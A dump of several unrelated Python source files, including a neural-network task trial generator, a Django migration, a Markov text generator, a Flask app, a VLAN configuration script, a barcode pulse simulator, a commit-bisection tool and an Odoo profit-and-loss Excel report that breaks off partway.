else:
raise ValueError('Unknown mode: ' + str(mode))
# time to check the saccade location
check_ons = stim2_ons + int(100/dt)
stim1_cats = stim1_locs<np.pi # Category of stimulus 1
stim2_cats = stim2_locs<np.pi # Category of stimulus 2
matchs = stim1_cats==stim2_cats
trial = Trial(config, tdim, batch_size)
trial.add('fix_in')
trial.add('stim', stim1_locs, ons=stim1_ons, offs=stim1_offs, mods=1)
trial.add('stim', stim2_locs, ons=stim2_ons, mods=1)
if hasattr(stim2_ons, '__iter__'):
fix_out_offs = list(stim2_ons)
else:
fix_out_offs = [stim2_ons]*batch_size
out_offs = [None]*batch_size
for i in range(batch_size):
if matchs[i] == 0: # If non-match
fix_out_offs[i] = None # Keep fixation
out_offs[i] = 0 # And don't go to stimulus location
trial.add('fix_out', offs=fix_out_offs)
trial.add('out', stim2_locs, ons=stim2_ons, offs=out_offs)
trial.add_c_mask(pre_offs=stim2_ons, post_ons=check_ons)
trial.epochs = {'fix1' : (None, stim1_ons),
'stim1' : (stim1_ons, stim1_offs),
'delay1' : (stim1_offs, stim2_ons),
'go1' : (stim2_ons, None)}
return trial
rule_mapping = {'testinit': test_init,
'fdgo': fdgo,
'reactgo': reactgo,
'delaygo': delaygo,
'fdanti': fdanti,
'reactanti': reactanti,
'delayanti': delayanti,
'dm1': dm1,
'dm2': dm2,
'contextdm1': contextdm1,
'contextdm2': contextdm2,
'multidm': multidm,
'delaydm1': delaydm1,
'delaydm2': delaydm2,
'contextdelaydm1': contextdelaydm1,
'contextdelaydm2': contextdelaydm2,
'multidelaydm': multidelaydm,
'dmsgo': dmsgo,
'dmsnogo': dmsnogo,
'dmcgo': dmcgo,
'dmcnogo': dmcnogo,
'oic': oic,
'dmc': delaymatchcategory_original}
rule_name = {'reactgo': 'RT Go',
'delaygo': 'Dly Go',
'fdgo': 'Go',
'dm1': 'DM 1',
'dm2': 'DM 2',
'contextdm1': 'Ctx DM 1',
'contextdm2': 'Ctx DM 2',
'multidm': 'MultSen DM',
'delaydm1': 'Dly DM 1',
'delaydm2': 'Dly DM 2',
'contextdelaydm1': 'Ctx Dly DM 1',
'contextdelaydm2': 'Ctx Dly DM 2',
'multidelaydm': 'MultSen Dly DM',
'reactanti': 'RT Anti',
'delayanti': 'Dly Anti',
'fdanti': 'Anti',
'dmsgo': 'DMS',
'dmsnogo': 'DNMS',
'dmcgo': 'DMC',
'dmcnogo': 'DNMC',
'oic': '1IC',
'dmc': 'DMC'
}
def generate_trials(rule, hp, mode, noise_on=True, **kwargs):
"""Generate one batch of data.
Args:
rule: str, the rule for this batch
hp: dictionary of hyperparameters
mode: str, the mode of generating. Options: random, test, psychometric
noise_on: bool, whether input noise is given
Return:
trial: Trial class instance, containing input and target output
"""
config = hp
trial = rule_mapping[rule](config, mode, **kwargs)
# Add rule input to every task
if 'rule_on' in kwargs:
rule_on = kwargs['rule_on']
else: # default behavior
rule_on = None
if 'rule_off' in kwargs:
rule_off = kwargs['rule_off']
else: # default behavior
rule_off = None
# overwrite current rule for input
if 'replace_rule' in kwargs:
rule = kwargs['replace_rule']
if rule is 'testinit':
# Add no rule
return trial
if isinstance(rule, six.string_types):
# rule is not iterable
# Expand to list
if 'rule_strength' in kwargs:
rule_strength = [kwargs['rule_strength']]
else:
rule_strength = [1.]
rule = [rule]
else:
if 'rule_strength' in kwargs:
rule_strength = kwargs['rule_strength']
else:
rule_strength = [1.] * len(rule)
for r, s in zip(rule, rule_strength):
trial.add_rule(r, on=rule_on, off=rule_off, strength=s)
if noise_on:
trial.add_x_noise()
return trial
|
19,234 | 04e007ac52cc9e4a8da9c1f82b9df2ffb4c0501a | def test3():
a = {5:5}
if isinstance(a, dict):
print('a is dic')
else:
print('a is not dic') |
19,235 | 9619b7a80ab35a5e2f8af2e88a403fee49e2d806 | # Generated by Django 3.1.1 on 2020-09-03 19:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0003_auto_20200903_1851'),
]
operations = [
migrations.AddField(
model_name='customuser',
name='full_name',
field=models.CharField(blank=True, max_length=40, null=True),
),
migrations.AddField(
model_name='customuser',
name='phone',
field=models.CharField(default='', max_length=13),
preserve_default=False,
),
migrations.AlterField(
model_name='customuser',
name='name',
field=models.CharField(max_length=20),
),
]
|
19,236 | 462cf4e1d96184c98e9f0ef552b28ac686af0ff1 | """This module contains a code example related to
Think Python, 2nd Edition
by Allen Downey
http://thinkpython2.com
Copyright 2015 Allen Downey
License: http://creativecommons.org/licenses/by/4.0/
"""
from __future__ import print_function, division
import sys
import string
import random
class Markov:
def __init__(self):
self.suffix_map = {} # map from prefixes to a list of suffixes
self.prefix = () # current tuple of words
def process_file(self, filename, order=2):
"""Reads a file and performs Markov analysis.
filename: string
order: integer number of words in the prefix
returns: map from prefix to list of possible suffixes.
"""
fp = open(filename)
self.skip_gutenberg_header(fp)
for line in fp:
for word in line.rstrip().split():
self.process_word(word, order)
#print(">>>DEBUG the suffix map")
#i = 0
#for k,v in self.suffix_map.items():
# print("key is {}, value is {}".format(k, v))
# i += 1
# if i > 10:
# break
def skip_gutenberg_header(self, fp):
"""Reads from fp until it finds the line that ends the header.
fp: open file object
"""
for line in fp:
if line.startswith('*END*THE SMALL PRINT!'):
break
def process_word(self, word, order=2):
"""Processes each word.
word: string
order: integer
During the first few iterations, all we do is store up the words;
after that we start adding entries to the dictionary.
"""
if len(self.prefix) < order:
self.prefix += (word,)
return
try:
self.suffix_map[self.prefix].append(word)
except KeyError:
# if there is no entry for this prefix, make one
self.suffix_map[self.prefix] = [word]
self.prefix = self.shift(self.prefix, word)
def random_text(self, n=100):
"""Generates random wordsfrom the analyzed text.
Starts with a random prefix from the dictionary.
n: number of words to generate
"""
# choose a random prefix (not weighted by frequency)
start = random.choice(list(self.suffix_map.keys()))
#print(">>DEBUG | start is", start)
for i in range(n):
#print(">> DEBUG | i is", n)
suffixes = self.suffix_map.get(start, None)
#print(">> DEBUG | suffixes is", suffixes)
if suffixes == None:
# if the start isn't in map, we got to the end of the
# original text, so we have to start again.
#print(">> DEBUG | start isn't in map")
random_text(n-i)
return
# choose a random suffix
word = random.choice(suffixes)
#print(">> DEBUG | word is", word)
print(word, end=' ')
start = self.shift(start, word)
def shift(self, t, word):
"""Forms a new tuple by removing the head and adding word to the tail.
t: tuple of strings
word: string
Returns: tuple of strings
"""
return t[1:] + (word,)
if __name__ == '__main__':
filename = 'emma.txt'
n = 10
markov = Markov()
markov.process_file(filename)
markov.random_text(n)
print()
|
19,237 | 673e7bf521e2a08bb3efa3d2df9e33026160869d | from flask import Flask, render_template, request
import requests
from application import app, db
from application.models import holiday_plan
from sqlalchemy import desc
@app.route('/', methods=['GET','POST'])
def index():
#get the name of the city
city = requests.get("http://encounters_server2:5000/city")
#get the activty
activity = requests.get("http://encounters_server3:5000/activity")
price_network = str(city.text) + " " + str(activity.text)
price = requests.post("http://encounters_server4:5000/price", data=price_network)
last_3_holidays = holiday_plan.query.order_by(desc(holiday_plan.id)).limit(3).all()
db.session.add(
holiday_plan(
city = city.text,
activity = activity.text,
price = price.text
)
)
db.session.commit()
return render_template('index.html', title='Holiday Generator',
city = city.text,
activity=activity.text, price = price.text,
price_network=price_network,
last_3_holidays=last_3_holidays)
|
19,238 | bfaf05accf860f602af707a3c292670bf94ac042 | import pyeapi
from pprint import pprint
import argparse
def check_vlan(a_list,vlan_id):
vlan_data=a_list[0]['result']['vlans']
vlans=vlan_data.keys()
for vlan in vlans:
if int(vlan_id) != int(vlan):
continue
else:
return True
def main():
parser = argparse.ArgumentParser()
parser.add_argument("vlan_id", help="vlan_id ",type=int)
parser.add_argument("--remove", help="option to remove the vlan",action="store_true")
args = parser.parse_args()
vlan_id=args.vlan_id
remove=args.remove
data={}
pynet_sw1=pyeapi.connect_to('pynet-sw1')
show_vlan_data=pynet_sw1.enable('show vlan')
result=check_vlan(show_vlan_data,vlan_id)
if remove:
if result:
print 'VLAN exists, we will remove it \n'
command_str = 'no vlan {}'.format(vlan_id)
pynet_sw1.config([command_str])
else:
print 'VLAN doesn\'t exist, thus there is no point to remove it'
else:
if result:
print 'VLAN exists, we will not create it'
else:
print 'Adding VLAN'
command_str = 'vlan {}'.format(vlan_id)
pynet_sw1.config([command_str])
if __name__ == '__main__':
main()
|
19,239 | 61a23f1ed3948f1e97ab628955ef6efc8cd21509 | from decoder import decoder
from objects import pulse
from helper import smart_datetime as datetime
from helper import smart_timedelta as timedelta
import DataStructures
import random
class TwoOfFiveSimulator(decoder):
def __init__(self,**kw):
self.modulus = 0.5
decoder.__init__(self,**kw)
def make(self,symbols,timeStamp,modulus=0.5,ratio=2.0,debug=False):
newSymbols = []
for s in symbols: #create random symbols if their values aren't defined
if s.value is not None:
newSymbols.append(s)
else:
newSymbols.append(self.symbols[random.randint(0,99)])
bars = []
for nS in newSymbols: #accumulate all of the bars
bars.extend(nS.bars)
pulses = []
#print bars
first_found = False
first = None
for b in bars: #iterate through the bars, creating pulses where needed
time = modulus
if b.wide:
time = modulus*2.0
if b.peak:
if first_found is False and first is not None:
first_found = True
first += timedelta(0,time/ratio)
if first is None:
first_found = True
first = timedelta(0,time/ratio)
#pdb.set_trace()
pulses.append(pulse(timeStamp=timeStamp+timedelta(0,time/ratio)))
if first_found is False and first is not None:
first += timedelta(0,time)
if first is None:
first = timedelta(0,time)
timeStamp += timedelta(0,time)
for i in range(len(pulses)):
pulses[i].timeStamp = pulses[i].timeStamp - first
return pulses,timeStamp
def makec(self,symbols,time):
real_symbols = []
#for every symbol
for symbol in symbols:
if symbol.value!=None:
value = symbol.value
else:
value = random.randint(0,99) #if not, create a random one
for realSymbol in self.symbols: #find the corresponding real symbol
appended = False
if (value==realSymbol.value): #and the val match
real_symbols.append(realSymbol) #keep the real symbol
appended = True
break #quit when you're done
if not appended:
for identifier in self.identifiers: #find the corresponding real symbol
appended = False
if (value==identifier.value): #and the val match
real_symbols.append(identifier) #keep the real symbol
appended = True
break #quit when you're done
if not appended:
raise ValueError('Could not find a defined symbol with value,',value)
#now let's take care of the timeStamps
final_symbols = []
new_time = time
for c in range(len(real_symbols)):
new_time
new_symbol = copy(real_symbols[c])
new_symbol.timeStamp = copy(new_time)
final_symbols.append(new_symbol)
new_time = new_time + timedelta(0,len(real_symbols[c])*self.modulus)
#for real_symbol in real_symbols:
# print "!!",real_symbol
return final_symbols
if __name__ == '__main__':
import unittest
from symbol_generation import generateSymbols, generateIdentifiers
class SimulationTests(unittest.TestCase):
def setup(self):
self.sim = TwoOfFiveSimulator()
self.sim.addSymbols(symbols=generateSymbols(),identifiers=generateIdentifiers())
def testSetup(self):
self.setup()
def testInst(self):
t = TwoOfFiveSimulator()
def test1(self):
self.setup()
t = [self.sim.symbols[-1],self.sim.identifiers[0],self.sim.symbols[0]]
print t
print self.sim.make(t,datetime.now(),debug=True)
# def testMakeChirp(self):
# self.setup()
# allChirps = Symbols.generate()
# t = mx.DateTime.now()
# print " "
# print "Start Time:",t
# data = self.sim.makec(allChirps[0:min(10,len(allChirps))],t)
# for d in data:
# print d
unittest.main()
|
19,240 | 4e94414ea9fd5974b00271e9317ce6247d295ca6 | from abc import ABC
import utils.helpers as util
import json
import os
from enum import Enum
import csv
class Mode(ABC):
@staticmethod
def factory(cfg):
modeClassName = util.checkAndGetClassnameByConfig(
cfg, "modeMap", "mode"
)
cl = util.checkAndGetSubclass(modeClassName, Mode)
return cl(cfg)
def __init__(self, cfg) -> None:
self.checkCfg(cfg)
self.commitPath = self.CommitPath()
traversalClassName = util.checkAndGetClassnameByConfig(
cfg, "traversalMap", "traversal"
)
traversalClass = util.checkAndGetSubclass(
traversalClassName, self.Traversal
)
self.traversal = traversalClass(self)
self.cfg = cfg
logPath = util.getActualPath("logPath", cfg)
self.commonLogger = util.setupLogger(
"commonLogger", logPath, "common_log.log"
)
def createCash(self):
# In common case we use json.
# Create cash is overrided if we need special algo for caching.
cp = util.getActualPath("cachePath", self.cfg)
if not os.path.exists(cp):
os.makedirs(cp)
self.cachePath = os.path.join(cp, "check_output_cache.json")
initCacheMap = {}
try:
with open(self.cachePath, "r+") as cacheDump:
if self.cfg["clearCache"]:
cacheDump.truncate(0)
json.dump(initCacheMap, cacheDump)
else:
try:
json.load(cacheDump)
except json.decoder.JSONDecodeError:
json.dump(initCacheMap, cacheDump)
except FileNotFoundError:
with open(self.cachePath, "w") as cacheDump:
json.dump(initCacheMap, cacheDump)
cacheDump.close()
def getCommitIfCashed(self, commit):
with open(self.cachePath, "r") as cacheDump:
cacheData = json.load(cacheDump)
cacheDump.close()
if commit in cacheData:
return True, cacheData[commit]
else:
return False, None
def setCommitCash(self, commit, valueToCache):
isCommitCashed, _ = self.getCommitIfCashed(commit)
if isCommitCashed:
raise util.CashError("Commit already cashed")
else:
with open(self.cachePath, "r+", encoding="utf-8") as cacheDump:
cacheData = json.load(cacheDump)
cacheData[commit] = valueToCache
cacheDump.seek(0)
json.dump(cacheData, cacheDump, indent=4)
cacheDump.truncate()
cacheDump.close()
def checkCfg(self, cfg):
if not ("traversal" in cfg["runConfig"]):
raise util.CfgError("traversal is not configured")
def prepareRun(self, i1, i2, list, cfg):
cfg["serviceConfig"] = {}
if cfg["checkIfBordersDiffer"] and not self.checkIfListBordersDiffer(
list, cfg):
raise util.RepoError("Borders {i1} and {i2} doesn't differ".format(
i1=i1, i2=i2))
self.commitList = list
def postRun(self, list):
util.returnToActualVersion(self.cfg)
if "printCSV" in self.cfg and self.cfg["printCSV"]:
fields = ['linId', 'logId', 'hash', 'value']
rows = []
linearId = 0
logId = 0
for item in list:
item = item.replace('"', "")
isCommitCashed, value = self.getCommitIfCashed(item)
if isCommitCashed:
row = [linearId, logId, item, value]
rows.append(row)
logId = logId + 1
linearId = linearId + 1
reportPath = util.getActualPath("logPath", self.cfg)
reportPath = os.path.join(reportPath, "report.csv")
with open(reportPath, 'w') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerow(fields)
csvwriter.writerows(rows)
def run(self, i1, i2, list, cfg) -> int:
self.prepareRun(i1, i2, list, cfg)
self.traversal.bypass(
i1, i2, list, cfg, self.commitPath
)
self.postRun(list)
def setOutputInfo(self, pathCommit):
# override if you need more details in output representation
pass
def getResult(self):
# override if you need more details in output representation
for pathcommit in self.commitPath.getList():
print("Break commit: {c}".format(
c=self.commitList[pathcommit.id])
)
def checkIfBordersDiffer(self, i1, i2, list, cfg):
raise NotImplementedError("checkIfBordersDiffer() is not implemented")
def checkIfListBordersDiffer(self, list, cfg):
return self.checkIfBordersDiffer(0, len(list) - 1, list, cfg)
class CommitPath:
def __init__(self):
self.commitList = []
def accept(self, traversal, commitToReport) -> None:
traversal.visit(self, commitToReport)
class CommitState(Enum):
BREAK = 1
SKIPPED = 2
class PathCommit:
def __init__(self, id, state):
self.id = id
self.state = state
def append(self, commit):
self.commitList.append(commit)
def pop(self):
return self.commitList.pop(0)
def getList(self):
return self.commitList
class Traversal(ABC):
def bypass(self, i1, i2, list, cfg, commitPath) -> int:
raise NotImplementedError()
def visit(self, cPath, commitToReport):
cPath.append(commitToReport)
def prepBypass(self, i1, i2, list, cfg):
skipInterval = cfg["noCleanInterval"]
cfg["serviceConfig"]["skipCleanInterval"] = i2 - i1 < skipInterval
self.mode.commonLogger.info(
"Check interval {i1}..{i2}".format(i1=i1, i2=i2)
)
self.mode.commonLogger.info(
"Check commits {c1}..{c2}".format(c1=list[i1], c2=list[i2])
)
def __init__(self, mode) -> None:
self.mode = mode
class FirstFailedVersion(Traversal):
def __init__(self, mode) -> None:
super().__init__(mode)
def bypass(self, i1, i2, list, cfg, commitPath) -> int:
self.prepBypass(i1, i2, list, cfg)
sampleCommit = 0
if "sampleCommit" in cfg["serviceConfig"]:
sampleCommit = cfg["serviceConfig"]["sampleCommit"]
if i1 + 1 >= i2:
isBad = self.mode.checkIfBordersDiffer(
sampleCommit, i1, list, cfg)
breakCommit = i1 if isBad else i2
pc = Mode.CommitPath.PathCommit(
breakCommit,
Mode.CommitPath.CommitState.BREAK
)
self.mode.setOutputInfo(pc)
commitPath.accept(self, pc)
return
mid = (int)((i1 + i2) / 2)
isBad = self.mode.checkIfBordersDiffer(
sampleCommit, mid, list, cfg)
if isBad:
self.bypass(
i1, mid, list, cfg, commitPath
)
else:
self.bypass(
mid, i2, list, cfg, commitPath
)
class FirstFixedVersion(Traversal):
def __init__(self, mode) -> None:
super().__init__(mode)
def bypass(self, i1, i2, list, cfg, commitPath) -> int:
self.prepBypass(i1, i2, list, cfg)
sampleCommit = 0
if "sampleCommit" in cfg["serviceConfig"]:
sampleCommit = cfg["serviceConfig"]["sampleCommit"]
if i1 + 1 >= i2:
isBad = self.mode.checkIfBordersDiffer(
sampleCommit, i1, list, cfg)
breakCommit = i2 if isBad else i1
pc = Mode.CommitPath.PathCommit(
breakCommit,
Mode.CommitPath.CommitState.BREAK
)
self.mode.setOutputInfo(pc)
commitPath.accept(self, pc)
return
mid = (int)((i1 + i2) / 2)
isBad = self.mode.checkIfBordersDiffer(
sampleCommit, mid, list, cfg)
if isBad:
self.bypass(
mid, i2, list, cfg, commitPath
)
else:
self.bypass(
i1, mid, list, cfg, commitPath
)
class AllBreakVersions(Traversal):
def __init__(self, mode) -> None:
super().__init__(mode)
def bypass(self, i1, i2, list, cfg, commitPath) -> int:
self.prepBypass(i1, i2, list, cfg)
sampleCommit = 0
if "sampleCommit" in cfg["serviceConfig"]:
sampleCommit = cfg["serviceConfig"]["sampleCommit"]
if i1 + 1 >= i2:
isBad = self.mode.checkIfBordersDiffer(
sampleCommit, i1, list, cfg)
breakCommit = i1 if isBad else i2
pc = Mode.CommitPath.PathCommit(
breakCommit,
Mode.CommitPath.CommitState.BREAK
)
self.mode.setOutputInfo(pc)
commitPath.accept(self, pc)
lastCommit = len(list) - 1
isTailDiffer = self.mode.checkIfBordersDiffer(
breakCommit, lastCommit, list, cfg)
if isTailDiffer:
cfg["serviceConfig"]["sampleCommit"] = breakCommit
self.bypass(
breakCommit, lastCommit,
list, cfg, commitPath
)
return
mid = (int)((i1 + i2) / 2)
isBad = self.mode.checkIfBordersDiffer(
sampleCommit, mid, list, cfg)
if isBad:
self.bypass(
i1, mid, list, cfg, commitPath
)
else:
self.bypass(
mid, i2, list, cfg, commitPath
)
|
19,241 | 899638f123748847844d83da49ac8d0969056bbd | # -*- coding: utf-8 -*-
import xlwt
import base64
from io import StringIO
from odoo import api, fields, models, _
class AccountProfitLossReport(models.TransientModel):
_name = "account.profit.loss.excel.report"
_description = 'Account Profit Loss Excel Report'
start_date = fields.Date(string='Start Date', required=True)
end_date = fields.Date(string='End Date', required=True)
region_ids = fields.Many2many('res.branch', string='Region')
city_ids = fields.Many2many('res.city', string='City')
product_ids = fields.Many2many('product.product', string='Products')
@api.multi
def print_excel(self):
file = StringIO()
workbook = xlwt.Workbook()
format0 = xlwt.easyxf('font:height 600,bold True;align: horiz left')
format1 = xlwt.easyxf('font:bold True;align: horiz left')
format2 = xlwt.easyxf('font:height 300,bold True;pattern: pattern solid, fore_colour gray25;align: horiz center;borders: left thin, right thin, top thin, bottom thin;')
format3 = xlwt.easyxf('font:height 200,bold True;pattern: pattern solid, fore_colour gray25;align: horiz center;borders: left thin, right thin, top thin, bottom thin;')
format4 = xlwt.easyxf('font:height 200,bold True;align: horiz center;borders: right thin, bottom thin;')
format5 = xlwt.easyxf('font:height 200,bold True;align: horiz center;borders: right thin;')
format6 = xlwt.easyxf('font:height 200,bold True;align: horiz center;borders: right thin, left thin;')
format7 = xlwt.easyxf('font:height 200,bold True;align: horiz center;borders: right thin, left thin, bottom thin;')
format8 = xlwt.easyxf('font:height 200,bold True,colour red;pattern: pattern solid, fore_colour light_green;align: horiz left;borders: left thin, right thin, top thin, bottom thin;')
format9 = xlwt.easyxf('font:height 200;align: horiz left;borders: left thin, right thin, top thin, bottom thin;')
format10 = xlwt.easyxf('font:height 200;align: horiz right;borders: left thin, right thin, top thin, bottom thin;')
format11 = xlwt.easyxf('font:height 200,bold True;align: horiz right;borders: left thin, right thin, top thin, bottom thin;')
format12 = xlwt.easyxf('font:height 200,bold True;align: horiz right;borders: left thin, right thin, top thin, bottom thin;pattern: pattern solid, fore_colour cyan_ega;')
format13 = xlwt.easyxf('font:height 200,bold True;pattern: pattern solid, fore_colour gray25;align: horiz center;borders: left thin, right thin, top thin, bottom thin;')
format14 = xlwt.easyxf('font:height 200,bold True;align: horiz right;borders: left thin, right thin, top thin, bottom thin;pattern: pattern solid, fore_colour orange;')
format15 = xlwt.easyxf('font:height 200,bold True;pattern: pattern solid, fore_colour orange;align: horiz center;borders: left thin, right thin, top thin, bottom thin;')
sheet = workbook.add_sheet('Project Profit & Loss Analysis')
sheet.col(7).width = 256 * 20
sheet.col(8).width = 256 * 20
sheet.col(9).width = 256 * 20
sheet.col(10).width = 256 * 20
sheet.col(11).width = 256 * 18
sheet.col(12).width = 256 * 20
sheet.col(13).width = 256 * 20
sheet.col(14).width = 256 * 20
sheet.col(15).width = 256 * 20
sheet.col(16).width = 256 * 18
sheet.write_merge(0, 3, 0, 6, 'Zaki Advertising Company', format0)
sheet.write_merge(4, 4, 0, 3, 'Project Profit & Loss Analysis', format1)
sheet.write_merge(6, 8, 0, 3, 'Location', format2)
sheet.write_merge(6, 8, 4, 6, 'Network', format2)
sheet.write_merge(6, 6, 7, 8, 'Sales - Rent', format3)
sheet.write(7, 7, '4100003', format5)
sheet.write(7, 8, '4100005', format5)
sheet.write(8, 7, 'Sales-Rent', format4)
sheet.write(8, 8, 'Sales-Rent Prvt.', format4)
sheet.write_merge(6, 6, 9, 10, 'Sales - Print', format3)
sheet.write(7, 9, '4100002', format5)
sheet.write(7, 10, '4100004', format5)
sheet.write(8, 9, 'Sales-Print', format4)
sheet.write(8, 10, 'Sales-Print Prvt.', format4)
sheet.write_merge(6, 8, 11, 11, 'Total Sales', format2)
sheet.write_merge(6, 6, 12, 13, 'COS - Rent', format3)
sheet.write(7, 12, '5100003', format5)
sheet.write(7, 13, '5100005', format5)
sheet.write(8, 12, 'COS-Rent', format4)
sheet.write(8, 13, 'COS-Rent Prvt.', format4)
sheet.write_merge(6, 6, 14, 15, 'COS - Print', format3)
sheet.write(7, 14, '5100002', format5)
sheet.write(7, 15, '5100004', format5)
sheet.write(8, 14, 'COS-Print', format4)
sheet.write(8, 15, 'COS-Print Prvt.', format4)
sheet.write_merge(6, 8, 16, 16, 'Total COS', format2)
sheet.col(17).width = 256 * 3
sheet.col(18).width = 256 * 20
sheet.col(19).width = 256 * 20
sheet.col(20).width = 256 * 20
sheet.col(21).width = 256 * 20
sheet.col(22).width = 256 * 20
sheet.col(23).width = 256 * 20
sheet.col(24).width = 256 * 20
sheet.col(25).width = 256 * 20
sheet.col(26).width = 256 * 20
sheet.col(27).width = 256 * 20
sheet.col(28).width = 256 * 18
sheet.write_merge(6, 6, 18, 27, 'OH COS', format3)
sheet.write(7, 18, '5200001', format6)
sheet.write(7, 19, '5200002', format6)
sheet.write(7, 20, '5200003', format6)
sheet.write(7, 21, '5200004', format6)
sheet.write(7, 22, '5200005', format6)
sheet.write(7, 23, '5200006', format6)
sheet.write(7, 24, '5200007', format6)
sheet.write(7, 25, '5200008', format6)
sheet.write(7, 26, '5200009', format6)
sheet.write(7, 27, '5200010', format6)
sheet.write(8, 18, 'Bank Chrgs', format7)
sheet.write(8, 19, 'Maintenance', format7)
sheet.write(8, 20, 'Assets Depr.', format7)
sheet.write(8, 21, 'Rent & Rates', format7)
sheet.write(8, 22, 'Buss. Travel', format7)
sheet.write(8, 23, 'Sub-Allw.', format7)
sheet.write(8, 24, 'Other Transpt', format7)
sheet.write(8, 25, 'Sales Comm', format7)
sheet.write(8, 26, 'Volume Rebate', format7)
sheet.write(8, 27, 'Others', format7)
sheet.write_merge(6, 8, 28, 28, 'Total OH COS', format3)
sheet.col(29).width = 256 * 3
sheet.col(30).width = 256 * 20
sheet.col(31).width = 256 * 20
sheet.col(32).width = 256 * 20
sheet.col(33).width = 256 * 20
sheet.write_merge(6, 6, 30, 33, 'Total', format3)
sheet.write_merge(7, 8, 30, 30, 'Sales', format7)
sheet.write_merge(7, 8, 31, 31, 'COS', format7)
sheet.write_merge(7, 8, 32, 32, 'Total GP', format7)
sheet.write_merge(7, 8, 33, 33, 'GP%', format7)
final_data = []
domain = [('date', '>=', self.start_date), ('date', '<=', self.end_date),
('branch_id', '!=', False), ('city_id', '!=', False),
('account_id.code', 'in', ['5200001', '5200002', '5200003', '5200004',
'5200005', '5200006', '5200007', '5200008', '5200009', '5200010',
'4100002', '4100003', '4100004', '4100005', '5100003', '5100005', '5100002', '5100004']),
('product_id', '!=', False), ('account_id', '!=', False)]
if self.region_ids:
domain += [('branch_id', 'in', self.region_ids.ids)]
if self.city_ids:
domain += [('city_id', 'in', self.city_ids.ids)]
if self.product_ids:
domain += [('product_id', 'in', self.product_ids.ids)]
move_line_ids = self.env['account.move.line'].search(domain)
if move_line_ids:
region_ids = self.region_ids if self.region_ids else self.env['res.branch'].search([])
city_ids = self.city_ids if self.city_ids else self.env['res.city'].search([('branch_id', '!=', False), ('branch_id', 'in', region_ids.ids)])
for region_id in region_ids:
values = {'region': region_id}
region_move_lines = move_line_ids.filtered(lambda r: r.branch_id.id == region_id.id)
city_data = []
if region_move_lines:
for city_id in city_ids.filtered(lambda r: r.branch_id.id == region_id.id):
city_move_lines = region_move_lines.filtered(lambda r:r.city_id.id == city_id.id)
for city_move_line_id in city_move_lines:
city_values = {
'product_id': city_move_line_id.product_id,
'debit_total': city_move_line_id.debit,
'credit_total': city_move_line_id.credit,
'code': city_move_line_id.account_id.code,
'city': city_id
}
city_data.append(city_values)
other_data = []
region_final_data = []
if city_data:
for line in city_data:
if {'city': line.get('city'), 'product_id': line.get('product_id')} in other_data:
for temp in region_final_data:
if temp.get('city') and temp.get('product_id') and temp.get('city') == line.get('city') \
and temp.get('product_id') == line.get('product_id'):
dict1 = temp.get('code_data')
if dict1.get(line.get('code')):
dict1.get(line.get('code')).append({'deposit_amount': line.get('debit_total'), 'credit_amount': line.get('credit_total')})
else:
dict1[line.get('code')] = [{'deposit_amount': line.get('debit_total'), 'credit_amount': line.get('credit_total')}]
temp['code_data'] = dict1
else:
other_data.append({'city': line.get('city'), 'product_id': line.get('product_id')})
region_final_data_values = {
'city': line.get('city'),
'product_id': line.get('product_id'),
'code_data': {line.get('code'): [{'deposit_amount': line.get('debit_total'), 'credit_amount': line.get('credit_total')}]}
}
region_final_data.append(region_final_data_values)
values.update({
'lines_data': region_final_data
})
final_data.append(values)
print (">>>>>>>", final_data)
print (">>>>>>>\n\n")
row = 9
final_total_code_4100003 = 0.0
final_total_code_4100005 = 0.0
final_total_code_4100002 = 0.0
final_total_code_4100004 = 0.0
final_total_code_5100003 = 0.0
final_total_code_5100005 = 0.0
final_total_code_5100002 = 0.0
final_total_code_5100004 = 0.0
final_total_code_5200001 = 0.0
final_total_code_5200002 = 0.0
final_total_code_5200003 = 0.0
final_total_code_5200004 = 0.0
final_total_code_5200005 = 0.0
final_total_code_5200006 = 0.0
final_total_code_5200007 = 0.0
final_total_code_5200008 = 0.0
final_total_code_5200009 = 0.0
final_total_code_5200010 = 0.0
final_sales_total = 0.0
final_purchase_total = 0.0
final_difference_total = 0.0
final_other_cos_total = 0.0
final_gp_percent_total = 0.0
for excel_data in final_data:
print (">>>>>>>excel_data.get('region').name", excel_data.get('region').name)
sheet.write_merge(row, row, 0, 3, excel_data.get('region').name, format8)
sheet.write_merge(row, row, 4, 6, '', format8)
sheet.write_merge(row, row, 7, 8, '', format8)
sheet.write_merge(row, row, 9, 10, '', format8)
sheet.write(row, 11, '', format8)
sheet.write_merge(row, row, 12, 13, '', format8)
sheet.write_merge(row, row, 14, 15, '', format8)
sheet.write(row, 16, '', format8)
sheet.write_merge(row, row, 18, 27, '', format8)
sheet.write(row, 28, '', format8)
sheet.write_merge(row, row, 30, 33, '', format8)
row += 1
city_names = []
semi_total_code_4100003 = 0.0
semi_total_code_4100005 = 0.0
semi_total_code_4100002 = 0.0
semi_total_code_4100004 = 0.0
semi_total_code_5100003 = 0.0
semi_total_code_5100005 = 0.0
semi_total_code_5100002 = 0.0
semi_total_code_5100004 = 0.0
semi_total_code_5200001 = 0.0
semi_total_code_5200002 = 0.0
semi_total_code_5200003 = 0.0
semi_total_code_5200004 = 0.0
semi_total_code_5200005 = 0.0
semi_total_code_5200006 = 0.0
semi_total_code_5200007 = 0.0
semi_total_code_5200008 = 0.0
semi_total_code_5200009 = 0.0
semi_total_code_5200010 = 0.0
semi_sales_total = 0.0
semi_purchase_total = 0.0
semi_difference_total = 0.0
semi_other_cos_total = 0.0
semi_gp_percent_total = 0.0
for excel_lines in excel_data.get('lines_data'):
sheet.write_merge(row, row, 0, 3, excel_lines.get('city').name, format9)
sheet.write_merge(row, row, 4, 6, excel_lines.get('product_id').name, format9)
code_data = excel_lines.get('code_data')
code_4100003 = 0.0
code_4100005 = 0.0
code_4100002 = 0.0
code_4100004 = 0.0
code_5100003 = 0.0
code_5100005 = 0.0
code_5100002 = 0.0
code_5100004 = 0.0
code_5200001 = 0.0
code_5200002 = 0.0
code_5200003 = 0.0
code_5200004 = 0.0
code_5200005 = 0.0
code_5200006 = 0.0
code_5200007 = 0.0
code_5200008 = 0.0
code_5200009 = 0.0
code_5200010 = 0.0
if code_data.get('4100003'):
deposit_amount_4100003 = sum([rec.get('deposit_amount') for rec in code_data.get('4100003')])
credit_amount_4100003 = sum([rec.get('credit_amount') for rec in code_data.get('4100003')])
code_4100003 = deposit_amount_4100003 - credit_amount_4100003
if code_data.get('4100005'):
deposit_amount_4100005 = sum([rec.get('deposit_amount') for rec in code_data.get('4100005')])
